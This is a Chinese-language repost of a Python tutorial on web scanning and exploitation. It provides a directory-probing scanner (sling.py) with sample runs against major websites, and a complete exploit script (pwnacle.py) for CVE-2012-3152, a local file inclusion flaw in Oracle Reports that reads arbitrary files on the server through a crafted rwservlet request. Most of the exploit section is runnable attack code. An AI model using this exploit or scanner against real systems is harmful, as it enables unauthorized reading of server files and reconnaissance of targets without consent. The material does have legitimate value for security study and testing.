0x7 Python教程:Web扫描和利用

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0x7 Python教程:Web扫描和利用

2024-05-17 13:15| 来源: 网络整理| 查看: 265






代码语言:javascript复制$ python sling.py -h Usage: sling.py -i -r -s [optional] Options: -h, --help show this help message and exit -i SERVERS specify target file with URLs -r RESOURCES specify a file with resources to request -s SEARCH [optional] Specify a search string -s

文件的格式应如下所示 - 每行包含URL“http://www.google.com/”的文件,以及每行请求“request /”的文件。示例: reqs: CFIDE / admin / tmp /


代码语言:javascript复制$ python sling.py -i URLs -r reqs [+] URL: http://www.google.com/CFIDE/ [404] [+] URL: http://www.google.com/admin/ [404] [+] URL: http://www.google.com/tmp/ [404] [+] URL: http://www.yahoo.com/CFIDE/ [404] [+] URL: http://www.facebook.com/CFIDE/ [404] [+] URL: http://www.facebook.com/admin/ [404] [+] URL: http://www.facebook.com/tmp/ [404]

现在,在发出这些请求时,您可能需要定义搜索词以减少必须经历的误报量。例如,如果您要请求“/ CFIDE/administrator/enter.cfm”,您可能需要检查页面上是否有“CFIDE”或“.cfm”以帮助减少误报。以下是将脚本与搜索词一起使用的示例:

代码语言:javascript复制$ python sling.py -i URLs -r reqs -s google [+] URL: http://www.google.com/CFIDE/ [404] Found: 'google' in ouput [+] URL: http://www.google.com/admin/ [404] Found: 'google' in ouput [+] URL: http://www.google.com/tmp/ [404] Found: 'google' in ouput



几个月前,安全研究员NI @root发布了Oracle Reports中本地文件包含(LFI)漏洞的漏洞利用详情。当时只存在PoC代码,漏洞和漏洞检查不在任何工具中。这是一个完美的用例,用于启动快速脚本以检查某些Oracle Reports Web服务器。该漏洞允许您通过发送以下请求获取Web服务器上的本地资源 - 您可以在“file:///”之后指定您感兴趣的文件或目录:

代码语言:javascript复制request = '/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER="file:///'


代码语言:javascript复制$ python pwnacle.py


代码语言:javascript复制####################################### # pwnacle.py - Exploits CVE-2012-3152 # # Oracle Local File Inclusion (LFI) # ####################################### import urllib, sys, ssl, inspect exec inspect.getsource(ssl.wrap_socket).replace("PROTOCOL_SSLv23","PROTOCOL_SSLv3") in dict(inspect.getmembers(ssl.wrap_socket))["func_globals"] import socket server = sys.argv[1] # Assigns first argument given at the CLI to 'server' variable dir = sys.argv[2] # Assigns second argument given at the CLI to 'dir' variable ip = server.split('/')[2] # formats the server by splitting the string based on the '/' which grabs the IP out of 'http://ip/' req = '/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER="file:///' #request format to exploit the vulnerability print "Sending Request: "+server+req+dir+'"' if 'http://' in server: # Use urllib module for http -- self signed SSL certs caused an exception with urllib try: conn = urllib.urlopen(server+req+dir+'"') # Sent the request to the server out = conn.readlines() for item in conn: print item.strip() except Exception as e: print e if 'https://' in server: # Create web request with ssl module try: conn = ssl.wrap_socket(socket.create_connection((ip, 443))) request = 'GET '+req+dir+'"'+' HTTP/1.1'+'n' request += 'Host: '+ip+'n' request += 'User-Agent: Mozilla/5.0 '+'n' request += 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'+'n' request += 'Accept-Language: en-US,en;q=0.5'+'n' request += 'Accept-Encoding: gzip, deflate'+'n' request += 'Connection: keep-alive'+'n' conn.send(request+'n') print conn.recv() print conn.recv(20098) except Exception as e: print e


代码语言:javascript复制##################################### # sling.py - checks for resources # # Can seach for string in response # ##################################### from bs4 import BeautifulSoup import sys, optparse, socket from urllib import urlopen class Colors: RED = '\033[91m' GREEN = '\033[92m' def webreq(server, resources): # Function takes in URL, and resources variable which contains the requests try: resource = [] for item in open(resources, 'r'): # Loop through the resource file resource.append(item.strip()) # Append each item in the file to the array for item in resource: # Loop through the array and create a request for each item in the array s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) # set a timeout on the socket connection url = server.strip()+item.strip() # Format the url variable to store the request: "http://www.site.com/CFIDE/administrator/enter.cfm" request = urlopen(url) # Make the request if search: # If the "search" variable is true (-s) parsed = BeautifulSoup(request.read(), "lxml") # Parse the output with BeautifulSoup if search in str(parsed): # If the search string is in the output print the next line print Colors.GREEN+"[+] URL: "+url+" ["+str(request.getcode())+"] Found: '"+search+"' in ouput" elif request.getcode() == 404: # If we got an HTTP status code print Colors.RED+"[+] URL: "+url+" ["+str(request.getcode())+"]" # Print the URL and status code elif request.getcode(): print Colors.GREEN+"[+] URL: "+url+" ["+str(request.getcode())+"]" except:pass def main(): # Creates CLI switches and stores in variables parser = optparse.OptionParser(sys.argv[0]+' '+ '-i -r -s [optional]') parser.add_option('-i', dest='servers', type='string', help='specify target file with URLs') parser.add_option('-r', dest='resources', type='string', help='specify a file with resources to request') parser.add_option('-s', dest='search', type='string', help='[optional] Specify a search string -s ') (options, args) = parser.parse_args() servers=options.servers resources=options.resources global search; search=options.search if (servers == None) and (resources==None): # Checks to make sure proper CLI switches were given print parser.usage # if not print usage sys.exit(0) if servers: for server in open(servers, 'r'): # loop through each URL in the file webreq(server, resources) # Invoke the webreq function if __name__ == "__main__": main()




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